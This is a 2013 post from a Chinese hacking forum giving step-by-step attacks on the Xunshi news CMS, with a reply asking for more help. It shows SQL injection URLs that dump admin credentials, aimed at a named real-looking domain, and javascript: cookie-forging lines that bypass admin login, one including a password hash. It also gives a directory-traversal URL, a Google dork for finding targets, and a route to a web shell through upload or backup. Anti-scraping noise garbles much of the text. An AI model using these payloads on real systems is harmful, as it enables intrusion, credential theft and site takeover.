找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2863|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
by:血封忆尘% e: K# g" Z3 ?7 g( c/ l" T" S

& p& z2 x$ m" S2 `在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新). z1 ^5 E# p8 \6 Q7 L
8 n* o4 p! ]2 e  {
以下本文总结来自黑防去年第9期杂志上的内容...
* J& z% z0 J5 B: c; `, }. X6 K( w- K. b
先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%" p$ c2 L) l5 t/ ?, O* @. n

* ]$ c( P+ x+ D1 W3 J+ s3 N' u26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2 2 m- Z: J' y9 Y& W

" i( B  N, @9 x$ f( c记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况- N! }* [9 u7 h) \1 l4 ]+ K
这里一个注入6 W: D8 v0 g8 b+ w  R) F

2 f7 y2 d4 k9 j. u- |效果如图:, Q# [; m, U& U. U) i! p: b
# i( t' N/ p- ~7 T2 i- K

9 z' E9 B0 [7 L" ]7 \6 l! g; B! Y8 c! z4 L; k% F8 h
这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.
* n/ o$ x5 w" ?# \; o
4 W  h0 x+ s6 K# P% J, R& k% f密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
$ {3 O! M/ V: \/ {3 I0 a+ x3 G
0 \  M! }. [5 f  z* h* xjavascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));/ X; N4 F4 w! i2 L2 d& b

3 E/ k7 j1 i7 Q: K9 A那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:- a. D6 ]6 y5 J# c% C& u
& a+ g' D% x- n
因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞
$ }7 `, ?. y1 {: K
) `& J+ e( y% `) c它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
; o1 t% m) j7 `% n3 \
$ X( h: y+ j$ o; S! x! E3 l访问这页面来列目录..步骤如下:
& \" P: ?$ I" U
( r4 u) T1 a+ Z% H# sjavascript:alert(document.cookie="admindj=1")
; N. Z, f( m! A) i9 r
- s: V! |! Q( e( xhttp://www.political-security.co ... asp?id=46&dir=../..
0 t' i: ]- x3 k9 l. a; q" ~. x  W7 k9 {" W# [. N
效果如图:
- d9 Q! \" f# u2 y/ E0 j% j# S% ~  f3 C$ ~% t
2 R* }/ \* s3 q  M
5 T& T0 \% z; Z( l% ]+ |1 `) _
这样全站目录都能瞧了..找到后台目录..进去..6 T) y4 w" `& V- z) H
3 m( s: R( u% j# o3 k3 {4 e
那么进了后台怎么拿shell??上传--备份就ok了../ q/ y# p' ?  i$ _, W# j* M

2 l3 x0 T8 D$ S1 z2 Q那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..
1 h, F, X" s* f* p7 a; C: j) W7 C* `$ _- o2 t
这个我也碰到过一次..你都可以通过列目录来实现../ u4 j" ^7 ~* ?1 o3 K- @& |

/ Q$ K, V% e+ O5 Y5 Q6 d8 qjavascript:alert(document.cookie="admindj=1") - H% D, p! ]# O# s. k
& c6 V6 p. @  J7 Z
http://www.political-security.co ... p?action=BackupData
9 J% o! Q. ^( K
) e3 t5 v5 Y1 c# }2 F) _备份ok..6 E  p' X0 Z- Q  e4 y! i

+ y3 r# m, c/ O4 z0 z, x那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?! I* X* F9 z  L8 [9 |) D- i6 u3 A

& t% W1 K% }6 @* f  G! r3 `8 R4 w在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下
7 |% P$ L4 O6 z6 A  f. k; f: X3 l. V' z/ e0 @! X
然后访问此页面进行注入..步骤如下:; h* a5 t- w0 ~" f
' i5 h5 W5 A7 o/ u  y, W
javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")/ d- `4 F& R+ H! z& ?3 A1 \9 p& Y

6 d; H/ X/ h! X- B' F& j然后请求admin/admin_chk.asp页面
% S$ w( ~( E# K! X2 i
8 i' j1 X% w1 m- b3 |0 P输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
9 u, [2 G# }- t6 n* {
9 n+ P5 k7 e* b4 Z8 ?4 X5 _26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin$ D. S8 q0 Y2 n! T

1 r- P8 p$ r. y: c5 q; g$ e5 {# s1 h" ^效果如图所示:
, F& g) W" c& ~; J8 @  ~
$ D( i$ t9 K' y! E( L$ k: K7 G 4 u3 {/ Z* R+ k) A

7 m' D1 L; Q. E0 z2 ?讯时漏洞2
$ V: y5 ^. |) ^7 Jgoogle关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)/ E1 M. z& j1 _, h3 I# E
7 N3 `9 _! @  q
1、/admin/admin_news_pl_view.asp?id=16 N1 k. c3 \3 N* G* l9 J9 B( V
//id任意 填入以下语句8 h* O9 E' |$ E% m2 q

* ?9 b# L: W+ {3 n- K' g2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!
& C! g% E) P# V4 q) S) U8 x 9 X1 v( ]5 ~' v

4 Z. j* h7 q' O
1 l' M3 c# ~6 p% H7 s' c! y3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='# ?- `9 i/ k, k' |  g8 u4 G

7 v) \4 a& r: v9 P6 y
' X  P# `5 B% S5 I" s8 d+ ^' c& M  `& O5 \3 z7 G& [' f* i
爆出管理员帐号和密码了
' l+ c( b5 ?) [  Z1 _+ t & e5 ^( U- i/ t# M
- _1 j5 D  B1 a: t) |& o
/ c6 c- m+ I  W8 K# U
4、cookies进后台# u) A9 v# \; x; _6 q2 g" B

, G+ ^2 Y4 w0 D' i2 J: P0 Ajavascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));
+ M0 W  {( t5 K( A- ]: [ 8 p) B- M$ L+ J; [3 C9 k

5 |  V6 }" X2 e$ p
3 Z, K- `* P, Z( s$ o5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!
* w" }. M6 d7 g3 J/ w8 l
* a, W8 M) x4 t( ]2 a# _
2 P! C+ g% o6 Q4 j6 q8 [* E  Y3 J# K
% F3 x- y# B8 q: S3 J6、后台有上传和备份取SHELL不难。
. l8 Y% O) Y- z5 N
4 X3 S# a' [6 h7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..5 ]( O* k/ L1 t! ^8 l) x; G! V- O
+ j, A( e3 `5 a
逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!, E9 W6 m/ h5 ~; i

. }% A2 ]9 _  R+ x1 t0 x% }- E( K* w. C
; T# Y/ P; n* A
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表